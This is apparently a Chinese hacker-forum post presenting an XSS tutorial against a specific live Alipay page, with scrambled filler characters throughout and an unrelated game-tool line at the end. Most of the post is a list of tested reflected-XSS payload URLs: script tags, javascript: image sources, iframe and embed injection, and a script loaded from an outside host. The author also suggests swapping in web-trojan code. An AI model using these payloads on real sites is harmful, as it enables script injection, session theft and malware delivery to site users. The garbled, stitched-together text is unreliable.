软件简介:
2 c2 ]$ @0 ^* m, Q2 x大家好 我是凯文比比奇/ Z Q1 R9 ]$ v) {
今天给大家带来一个关于xss跨站的教程5 L, i7 W0 g/ \9 f. X
这是漏洞地址http://union.alipay.com/alipay/choujiang1/order.php
( T: M1 T' m$ ~ E1 X+ _- b好了`大家看我操作啦 是淘宝的
- [/ k' c. ^# e- X: v) m看到了没
4 r- }2 j* P+ n! Ahttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=%3Cstrong%3E%B7%C7%B3%A3%B8%D0%D0%BB%C4%FA%B5%C4%B2%CE%D3%EB%A3%AC%B4%CB%BD%BB%D2%D7%BA%C5%B2%BB%C4%DC%B2%CE%D3%EB%B8%C3%CA%B1%B6%CE%B9%CE%BD%B1%0D%0A%CD%AC%CA%B1%C2%FA%D7%E3%D2%D4%CF%C2%CC%F5%BC%FE%B5%C4%BD%BB%D2%D7%BA%C5%BF%C9%B2%CE%D3%EB%B1%BE%C6%DA%B9%CE%BD%B1%A3%BA%3C%2Fstrong%3E%3Cbr%2F%3E%3Cul%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E%BB%EE%B6%AF%C6%DA%BC%E4%D4%DA%CC%D4%B1%A6%B9%BA%CE%EF%A3%AC%CA%D7%B4%CE%B8%B6%BF%EE%B5%BD%D6%A7%B8%B6%B1%A6%B5%C4%BD%BB%D2%D7%BA%C5%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F18-7%2F25%CD%EA%B3%C9%B8%B6%BF%EE%B5%C4%BB%E1%D4%B1%D4%DA7%2F27-8%2F1%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F26-7%2F31%CD%EA%B3%C9%BD%BB%D2%D7%B5%C4%BB%E1%D4%B1%D4%DA8%2F2-8%2F5%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3C%2Ful%3E {6 W( H5 F x P* g6 a* A" ^
这是url编码 3 O( j! k$ T7 Y# _3 X
支付宝交易号是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=这个页面来传递的,而url编码是http识得的
# k* G2 `' I, E4 k& T4 y7 \0 G. d好了,既然这样那么我们可以来构造语句,当然这里是存在xss跨站漏洞的 我们来测试一下,这样上不行的 我们再来看0 L, s8 \. r* E7 h
看到了吗。是可以的,看到了没``好了,我们再来看看其他的几种xss测试代码" ?; n! N7 @& m1 o2 ]3 h3 }5 p8 c
都行的,下面的这些测试代码我都测试过,都通过,
' q7 |, w( q! g测试代码:
' o3 {" y$ T( [http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=scriptalert(497751579)/script
) h1 Z. Z& u6 ^8 }http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=SCRIPT SRC=http://ha.ckers.org/xss.js/SCRIPT这段是利用script/script标签插如js脚本; z6 G4 N9 ~* h$ O6 t
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert('XSS');
4 t6 o8 Q' Y+ m1 Shttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert(XSS)
$ w9 a2 m9 n% t) h4 Xhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=`javascript:alert(RSnake says, 'XSS')`这三种都是一样的
6 z9 n, e% t" z& E3 T9 n$ _http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert(String.fromCharCode(83,83,83))利用js编码fromCharCode(83,83,83)达到跨站目的
s- F- S- V& z9 g2 b) xhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IFRAME SRC=javascript:alert('XSS');/IFRAME框架,懂挂马的朋友都知道的" i" k5 C$ r: b: ?
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=EMBED SRC=http://union.alipay.com/alipay/imagefile/market/cj_index.swf AllowScriptAccess=always/EMBED这段xss是利用html里面的embed/embed插入.swf动画4 ~% ^1 m9 M6 J0 {4 X' o
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=SCRIPT SRC=http://union.alipay.com/alipay/imagefile/market/cj_02.jpg/SCRIPT这段是src带插入图片的3 U" M& ]/ H4 O
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=A%20HREF=http://www.baidu.com/administrator/A超连接( |0 m) W2 e3 |! O2 K
通过a href=/a来插入超连接的& h' [! G, h$ V; X3 _
. f9 ]# t5 G5 B& }. k `# o
好了。来总结一下7 @) S% L3 l; e
该跨站是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=地址传递html值从而存在跨站的
& F: P9 l0 [& c, f- E0 R; N这个漏洞也有人发现过,这里只是通过教程发出来 让大家知道跨站的危害 ,假如我们把上面这些跨站代码里面的一些javascript脚本或是swf等利用html潜入的文件改成网马之类的就存在很大的危害噢``# W+ K1 U2 G: k) g) E
好了 教程就到这里吧 有什么不懂的问题就加我好了 Q:49771579
: Y. I$ t& H5 ~6 P. I* c7 P最后希望黑鹰管理员给我发一个邀请码咯 好方便以后去黑鹰和大家共同交流学习 Email:service-mail@163.com
0 t, P9 S: n7 B/ P+ i# c谢谢大家观看 拜拜`` |0 r4 w0 R1 _/ S4 n- z+ I: g4 g; V
下载地址:
|
天龙八部合区工具非常好用无任何限制
